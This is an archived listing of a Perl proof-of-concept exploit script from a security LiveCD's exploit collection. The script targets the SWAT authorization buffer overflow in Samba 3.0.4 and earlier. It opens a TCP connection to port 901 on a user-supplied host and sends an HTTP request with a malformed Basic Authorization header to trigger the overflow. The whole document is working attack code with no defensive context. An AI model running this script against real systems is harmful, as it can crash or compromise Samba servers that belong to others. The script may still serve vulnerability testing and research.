home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / samba / sambaSWATBufferOverflowPOC.pl < prev    next >
Perl Script  |  2005-02-12  |  878b  |  47 lines

  1. #!/usr/bin/perl
  2. # Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
  3. # Created by Noam Rathaus of Beyond Security Ltd.
  4. #
  5.  
  6. use IO::Socket;
  7. use strict;
  8.  
  9. my $host = $ARGV[0];
  10.  
  11. my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
  12. PeerPort => "901" );
  13.  
  14. unless ($remote) { die "cannot connect to http daemon on $host" }
  15.  
  16. print "connected\n";
  17.  
  18. $remote->autoflush(1);
  19.  
  20. my $http = "GET / HTTP/1.1\r
  21. Host: $host:901\r
  22. User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712
  23. Firefox/0.9.1\r
  24. Accept: text/xml\r
  25. Accept-Language: en-us,en;q=0.5\r
  26. Accept-Encoding: gzip,deflate\r
  27. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r
  28. Keep-Alive: 300\r
  29. Connection: keep-alive\r
  30. Authorization: Basic =\r
  31. \r
  32. ";
  33.  
  34. print "HTTP: [$http]\n";
  35. print $remote $http;
  36. sleep(1);
  37. print "Sent\n";
  38.  
  39. while (<$remote>)
  40. {
  41.  print $_;
  42. }
  43. print "\n";
  44.  
  45. close $remote;
  46.  
  47.